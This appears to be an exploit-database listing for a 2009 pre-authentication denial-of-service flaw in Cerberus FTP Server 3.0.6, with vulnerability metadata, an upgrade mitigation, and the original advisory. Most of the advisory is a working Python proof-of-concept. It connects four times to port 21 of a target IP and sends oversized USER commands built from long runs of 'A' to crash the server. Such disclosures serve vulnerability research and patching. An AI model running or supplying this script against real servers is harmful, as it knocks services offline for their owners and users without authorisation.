header-logo
Suggest Exploit
vendor:
Cerberus FTP Server
by:
Francis Provencher
7.5
CVSS
HIGH
Remote DoS
400
CWE
Product Name: Cerberus FTP Server
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: YES
Related CWE: N/A
CPE: a:cerberusftp:cerberus_ftp_server:3.0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2, Windows Vista SP1
2009

Cerberus FTP Server Denial of Service Exploit (Pre Auth)

Cerberus FTP Server is vulnerable to a Denial of Service attack. An attacker can send a specially crafted packet to the server, causing it to crash. This exploit does not require authentication.

Mitigation:

Upgrade to the latest version of Cerberus FTP Server.
Source

Exploit-DB raw data:

#####################################################################################

Application: Cerberus FTP 3.0.6

Platforms: Windows XP Professional SP2
Windows Vista SP1

crash:	 YES

Exploitation: Remote DoS

Date: 2009-09-30

Author: Francis Provencher (Protek Research Lab's)

#####################################################################################

1) Introduction
2) Technical details
3) The Code

#####################################################################################

===============
1) Introduction
===============

Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.

(from Cerberus FTP server website)

#####################################################################################

============================
2) Technical details 
============================

Cerberus FTP server Professional
Version 3.0.6
Build date 2009/09/28

#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

#!/usr/bin/env python

###################################################################################
#
# Cerberus FTP Server Denial of Service Exploit (Pre Auth)
# Found By: Francis Provencher (Protek Research Lab's)
# Tested On: Windows XPSP2
# Usage: ./script <Target IP>
#
###################################################################################

import socket, sys

def banner():
	print "\n##################################################################"
	print "# #"
	print "# Cerberus FTP Server Denial of Service Exploit (Pre Auth) #"
	print "# Francis Provencher (Protek Researh Lab's) #"
	print "# #"
	print "##################################################################\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);

buff1 = ("\x41" * 330 );
buff2 = ("\x41" * 520 );
buff3 = ("\x41" * 2230 );

try:
	banner();
	print ("[*] Connecting to target...");
	s1.connect((sys.argv[1] , 21));
	s2.connect((sys.argv[1] , 21));
	s3.connect((sys.argv[1] , 21));
	s4.connect((sys.argv[1] , 21));
	print ("[*] Sending evil stuff...");
	s1.send("USER " + buff1 + "\r\n");
	s2.send("USER " + buff2 + "\r\n");
	s3.send("USER " + buff3 + "\r\n");
	s4.send("USER " + buff1 + "\r\n");
	print ("[*] Success! The server should now be inaccessible");
	s1.close();
	s2.close();
	s3.close();
	s4.close();

except:
	print ("[-] Could not connect to server.");

#####################################################################################
(PRL-2009-09)